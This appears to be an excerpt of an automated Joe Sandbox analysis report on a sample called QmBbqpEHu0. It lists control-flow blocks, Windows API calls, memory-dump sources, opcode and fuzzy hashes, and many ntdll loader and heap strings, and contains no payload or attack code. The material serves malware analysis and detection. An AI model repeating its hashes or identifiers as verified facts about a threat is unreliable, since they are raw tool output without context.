• Opcode ID: 75b64f5f9338c3b0d63f75708259dbdd9b7bbbbadf4148c30b6a70576e27ca1c
• Instruction ID: b1f2822fdde1a8a37edeeec6d97a4a6f8e628c87287faab8aeed485a3d20c385
• Opcode Fuzzy Hash: 75b64f5f9338c3b0d63f75708259dbdd9b7bbbbadf4148c30b6a70576e27ca1c
• Instruction Fuzzy Hash: 7701A571D0011C7AEB10AAE19C81EEF7B7C9F41358F418069FA0467141D57C4E0687B5

Control-flow Graph

• Entry block 417db6-417dbe
• Block 417dc3-417dec: call 42fa53
• Block 417df2-417df6: call 430053
• Block 417e02-417e0d: call 4302f3
• Block 417e10-417e21: call 42e4f3
• Block 417d7c-417d8d: call 417ae3
• Block 417e23-417e37: LdrLoadDll
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E35
Memory Dump Source
• Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: e92e2bd8e92d6cf6769027d0a7ab914c286abf308111735771e30c1c5e85870c
• Instruction ID: 768e9a2dea899310e52eb886fb54352dee10bc69cabf07a1c405106990d73114
• Opcode Fuzzy Hash: e92e2bd8e92d6cf6769027d0a7ab914c286abf308111735771e30c1c5e85870c
• Instruction Fuzzy Hash: BF212775E0810E6BDB10EB54E841EFEB775AF51308F04419BE84887241F63AAA99C765

                                                                                                                                       Control-flow Graph: 344 42d0c3-42d104 call 404943 call 42e003 RtlAllocateHeap
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(?,0041EBBE,?,?,00000000,?,0041EBBE,?,?,?), ref: 0042D0FF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: eae60f949f5d12015151136e4b213714b0ff1f3c610ce3c3bf1f382d234a3899
                                                                                                                                      • Instruction ID: bd14d76cccbd5b5b5072585d725f183bb722e8bbb970f0ac88227b98fc761909
                                                                                                                                      • Opcode Fuzzy Hash: eae60f949f5d12015151136e4b213714b0ff1f3c610ce3c3bf1f382d234a3899
                                                                                                                                      • Instruction Fuzzy Hash: 54E092B13043147BC610EE6ADC85F9B73ACEFC9718F000419FA08A7241D775B9108BB8

                                                                                                                                       Control-flow Graph: 349 42d113-42d154 call 404943 call 42e003 RtlFreeHeap
                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,348F3D41,00000007,00000000,00000004,00000000,00417628,000000F4), ref: 0042D14F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                      • Opcode ID: fbcce9ac393ef9d6e8187d69ea3e8cd08d51942079d650599fc94455718920a1
                                                                                                                                      • Instruction ID: 5a24fe1c8667838e1b86e8c9ddda84145e04184eafb81871ef1f6178e643cdb2
                                                                                                                                      • Opcode Fuzzy Hash: fbcce9ac393ef9d6e8187d69ea3e8cd08d51942079d650599fc94455718920a1
                                                                                                                                      • Instruction Fuzzy Hash: 60E06DB23042147BD610EE5ADC45E9B77ACEFC5714F000019F908A7241D675B9118AB5

                                                                                                                                       Control-flow Graph: 359 42d163-42d19c call 404943 call 42e003 ExitProcess
                                                                                                                                      APIs
                                                                                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,C8E77539,?,?,C8E77539), ref: 0042D197
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExitProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                      • Opcode ID: 0784899f664b46459984781d242e4c204c322996c6f648afae983b60901c4e29
                                                                                                                                      • Instruction ID: 70ab90042a3d36bc48ece20a69110b5b6613236de1f56952ea0b987fd4a41942
                                                                                                                                      • Opcode Fuzzy Hash: 0784899f664b46459984781d242e4c204c322996c6f648afae983b60901c4e29
                                                                                                                                      • Instruction Fuzzy Hash: F6E04F716002147BC720AA6AEC41F9B775CDBC5714F00401AFA0967281D675B91187F5

                                                                                                                                       Control-flow Graph: 364 1002c0a-1002c0f; 365 1002c11-1002c18 (364->365); 366 1002c1f-1002c26 LdrInitializeThunk (364->366)
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: f77f0b6a16c5d16a1c0a2f399eabaecee99fa8ceb72dfa96a5df1adc0b1a437b
                                                                                                                                      • Instruction ID: 9150c5892b5b84b56578f49eaf216de565dcb3c1bb924312406f110358bc5803
                                                                                                                                      • Opcode Fuzzy Hash: f77f0b6a16c5d16a1c0a2f399eabaecee99fa8ceb72dfa96a5df1adc0b1a437b
                                                                                                                                      • Instruction Fuzzy Hash: BDB09B729415C5C6FA52E764460CB17794077D1701F55C066D2430685F873CC1D1E275
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-2160512332
                                                                                                                                      • Opcode ID: 54d4c8af04d06683ada8fe7a5406e353ccb76e259082ae076fb2a0f7364c3b4c
                                                                                                                                      • Instruction ID: 6c678ab458657b589aa3ab3c19dbe12bef5bcf1d3b22d939b63cadec9308a44d
                                                                                                                                      • Opcode Fuzzy Hash: 54d4c8af04d06683ada8fe7a5406e353ccb76e259082ae076fb2a0f7364c3b4c
                                                                                                                                      • Instruction Fuzzy Hash: 08929CB1604341ABE721DF28D880BABBBE8BF84754F04496DFAD4D7291D774E844CB92
                                                                                                                                      Strings
                                                                                                                                      • Critical section debug info address, xrefs: 0103541F, 0103552E
                                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010354E2
                                                                                                                                      • 8, xrefs: 010352E3
                                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010354CE
                                                                                                                                      • Thread identifier, xrefs: 0103553A
                                                                                                                                      • Critical section address., xrefs: 01035502
                                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01035543
                                                                                                                                      • double initialized or corrupted critical section, xrefs: 01035508
                                                                                                                                      • Address of the debug info found in the active list., xrefs: 010354AE, 010354FA
                                                                                                                                      • Critical section address, xrefs: 01035425, 010354BC, 01035534
                                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0103540A, 01035496, 01035519
                                                                                                                                      • Invalid debug info address of this critical section, xrefs: 010354B6
                                                                                                                                      • corrupted critical section, xrefs: 010354C2
                                                                                                                                      • undeleted critical section in freed memory, xrefs: 0103542B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                      • API String ID: 0-2368682639
                                                                                                                                      • Opcode ID: f466b22447658f3176211e26f73e73e4c88dd67e3b390e382572ab0331534c09
                                                                                                                                      • Instruction ID: 00c4f1be52fdd4a96aafbe7ef2bffc9fe06e82156ce1fbfbcc502e58f2f76645
                                                                                                                                      • Opcode Fuzzy Hash: f466b22447658f3176211e26f73e73e4c88dd67e3b390e382572ab0331534c09
                                                                                                                                      • Instruction Fuzzy Hash: 5981ABB0A40348AFDB20CF99CC45BAEBBF9BF49B14F104059F944B7290D7B5A945DB60
                                                                                                                                      Strings
                                                                                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010322E4
                                                                                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01032412
                                                                                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010324C0
                                                                                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01032498
                                                                                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01032409
                                                                                                                                      • @, xrefs: 0103259B
                                                                                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01032602
                                                                                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010325EB
                                                                                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0103261F
                                                                                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01032624
                                                                                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01032506
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                      • API String ID: 0-4009184096
                                                                                                                                      • Opcode ID: 09061dd0c28ededf94068002cf7e718919b7342d8837a63bad0530a60b252931
                                                                                                                                      • Instruction ID: ead77c326ae6cb7f86b5fcc76bb37e6e41582298ce489e107709431ea588296b
                                                                                                                                      • Opcode Fuzzy Hash: 09061dd0c28ededf94068002cf7e718919b7342d8837a63bad0530a60b252931
                                                                                                                                      • Instruction Fuzzy Hash: 2B0260F2D002299BDB61DB14CD80BEDB7B8AF44714F0041EAA749A7251EB70AF84DF59
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                      • API String ID: 0-2515994595
                                                                                                                                      • Opcode ID: c7d0be3e44c902b08ac57d14e0ecf3bd0a45b32aaeb0341ea2dad1ca9100eccf
                                                                                                                                      • Instruction ID: b227a3355d42cba22e956d4b7248ed456c026790b1c7a34320644469af58638e
                                                                                                                                      • Opcode Fuzzy Hash: c7d0be3e44c902b08ac57d14e0ecf3bd0a45b32aaeb0341ea2dad1ca9100eccf
                                                                                                                                      • Instruction Fuzzy Hash: 0E51E2715183059BD725EF188848BABBBECEF94350F14891EF9D8C3285E770D504DBA2
Strings
Memory Dump Source
• Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
• API String ID: 0-1700792311
Strings
• AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01048A67
• VerifierDlls, xrefs: 01048CBD
• VerifierDebug, xrefs: 01048CA5
• AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01048A3D
• AVRF: -*- final list of providers -*- , xrefs: 01048B8F
• HandleTraces, xrefs: 01048C8F
• VerifierFlags, xrefs: 01048C50
Similarity
• API ID:
• String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
• API String ID: 0-3223716464
Strings
Similarity
• API ID:
• String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
• API String ID: 0-1109411897
Strings
Similarity
• API ID:
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
• API String ID: 0-792281065
Strings
• Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01019A2A
• LdrpInitShimEngine, xrefs: 010199F4, 01019A07, 01019A30
• Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010199ED
• minkernel\ntdll\ldrinit.c, xrefs: 01019A11, 01019A3A
• apphelp.dll, xrefs: 00FB6496
• Getting the shim engine exports failed with status 0x%08lx, xrefs: 01019A01
Similarity
• API ID:
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-204845295
Strings
• Loading import redirection DLL: '%wZ', xrefs: 01038170
• LdrpInitializeProcess, xrefs: 00FFC6C4
• LdrpInitializeImportRedirection, xrefs: 01038177, 010381EB
• Unable to build import redirection Table, Status = 0x%x, xrefs: 010381E5
• minkernel\ntdll\ldrinit.c, xrefs: 00FFC6C3
• minkernel\ntdll\ldrredirect.c, xrefs: 01038181, 010381F5
Similarity
• API ID:
• String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
• API String ID: 0-475462383
Strings
• RtlGetAssemblyStorageRoot, xrefs: 01032160, 0103219A, 010321BA
• SXS: %s() passed the empty activation context, xrefs: 01032165
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010321BF
• SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01032180
• SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01032178
• SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0103219F
Similarity
• API ID:
• String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
• API String ID: 0-861424205
APIs
  • Part of subcall function 01002DF0: LdrInitializeThunk.NTDLL ref: 01002DFA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01000BA3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01000BB6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01000D60
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01000D74
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
• String ID:
• API String ID: 1404860816-0
Strings
Similarity
• API ID:
• String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
• API String ID: 0-379654539
Strings
• LdrpInitializeProcess, xrefs: 00FF8422
• @, xrefs: 00FF8591
• minkernel\ntdll\ldrinit.c, xrefs: 00FF8421
• \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00FF855E
Similarity
• API ID:
• String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
• API String ID: 0-1918872054
Strings
• RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010321D9, 010322B1
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010322B6
• SXS: %s() passed the empty activation context, xrefs: 010321DE
• .Local, xrefs: 00FF28D8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                      • API String ID: 0-1239276146
                                                                                                                                      • Opcode ID: cf3544e84b4fd2fd032a54f8e43568a9e9ed56ef3053717f82299dadae2a7fa6
                                                                                                                                      • Instruction ID: 4e6b1a1c39a9b62ac0d3689ab62f45853c87652b3a28a72e0320c6be87eb3918
                                                                                                                                      • Opcode Fuzzy Hash: cf3544e84b4fd2fd032a54f8e43568a9e9ed56ef3053717f82299dadae2a7fa6
                                                                                                                                      • Instruction Fuzzy Hash: 4DA1AD32D0122D9BDB74DF64CC84BA9B3B5BF58314F2541EADA48A7261D7709E80EF90
                                                                                                                                      Strings
                                                                                                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0103342A
                                                                                                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01033437
                                                                                                                                      • RtlDeactivateActivationContext, xrefs: 01033425, 01033432, 01033451
                                                                                                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01033456
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                      • API String ID: 0-1245972979
                                                                                                                                      • Opcode ID: ffa6c221a2cf72aacafe68e6a5a4cafeae56c9761adffdb15179ffc67de823fc
                                                                                                                                      • Instruction ID: fdb92f494194ada935b4f8d5f903c041936cf455a0df91c6ec579d4e748a34b1
                                                                                                                                      • Opcode Fuzzy Hash: ffa6c221a2cf72aacafe68e6a5a4cafeae56c9761adffdb15179ffc67de823fc
                                                                                                                                      • Instruction Fuzzy Hash: 63611576640B169BD722CF18C882B3BB7E5AFC0B60F148559EA959F291DB34FC00DB91
                                                                                                                                      Strings
                                                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010210AE
                                                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01021028
                                                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01020FE5
                                                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0102106B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                      • API String ID: 0-1468400865
                                                                                                                                      • Opcode ID: 03d727a7c531c1508861dc9bad073177946d805b452d90fd75203cb0e66db3c6
                                                                                                                                      • Instruction ID: 08aa4566a2701146a3de11973692f31076650ddd70898badc6142d33a8f4984b
                                                                                                                                      • Opcode Fuzzy Hash: 03d727a7c531c1508861dc9bad073177946d805b452d90fd75203cb0e66db3c6
                                                                                                                                      • Instruction Fuzzy Hash: 0E7103B19083069FCB61DF14C985F977BA8AF94764F140868F9888B28AD734D588DBD2
                                                                                                                                      Strings
                                                                                                                                      • LdrpDynamicShimModule, xrefs: 0102A998
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0102A9A2
                                                                                                                                      • apphelp.dll, xrefs: 00FE2462
                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0102A992
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-176724104
                                                                                                                                      • Opcode ID: 8449944cafe22d8b8f4d7ac32f81d2895106b73b66206463f645410ea057b235
                                                                                                                                      • Instruction ID: a19554d777022e39454a623bc82f77d19ae237844fe7d7d4472fdeab112db26c
                                                                                                                                      • Opcode Fuzzy Hash: 8449944cafe22d8b8f4d7ac32f81d2895106b73b66206463f645410ea057b235
                                                                                                                                      • Instruction Fuzzy Hash: 5A316A72B00211EBDB31DF5AD8C1AEAB7F9FB84B14F250069F980AB245DB76A941D740
                                                                                                                                      Strings
                                                                                                                                      • HEAP: , xrefs: 00FD3264
                                                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00FD327D
                                                                                                                                      • HEAP[%wZ]: , xrefs: 00FD3255
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                      • API String ID: 0-617086771
                                                                                                                                      • Opcode ID: d0e477fbd3e824ac83ecf775ef7853bd5774c0891f10f4f15f61976d954d7224
                                                                                                                                      • Instruction ID: a86534b0902a74e26cedca39fac2c849e80a88ba93860accc48671c8bbb6e1ef
                                                                                                                                      • Opcode Fuzzy Hash: d0e477fbd3e824ac83ecf775ef7853bd5774c0891f10f4f15f61976d954d7224
                                                                                                                                      • Instruction Fuzzy Hash: D092EE71E042499FDB25CF68C440BADBBF2FF58310F18805AE985AB351D735AA41EF91
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                      • API String ID: 0-4253913091
                                                                                                                                      • Opcode ID: 780ebed158ac53e8f49b38dab1617df9963427cd4fb70bae4f76718faac12815
                                                                                                                                      • Instruction ID: e1ab798373c339dff98db3ace4491e13bb2859a83b0ab96643d07fff571b8d6f
                                                                                                                                      • Opcode Fuzzy Hash: 780ebed158ac53e8f49b38dab1617df9963427cd4fb70bae4f76718faac12815
                                                                                                                                      • Instruction Fuzzy Hash: FCF1C131A00605DFEB15CF68C894BAAB7F6FF45304F2841A9E4569B382DB34E941EB51
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $@
                                                                                                                                      • API String ID: 0-1077428164
                                                                                                                                      • Opcode ID: 0fa8426b2c4f26bf7260a1831751eec06f8f8ab172f21927b2d3bcddcfe6718a
                                                                                                                                      • Instruction ID: 44a386cf993a7cff636793b2cc4a1fe31724fe859f6ebf438af90b99d1980bc7
                                                                                                                                      • Opcode Fuzzy Hash: 0fa8426b2c4f26bf7260a1831751eec06f8f8ab172f21927b2d3bcddcfe6718a
                                                                                                                                      • Instruction Fuzzy Hash: 69C28C72A083919FE725CF29C881BABBBE5AF88754F14892DF9C9C7241D734D804DB52
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
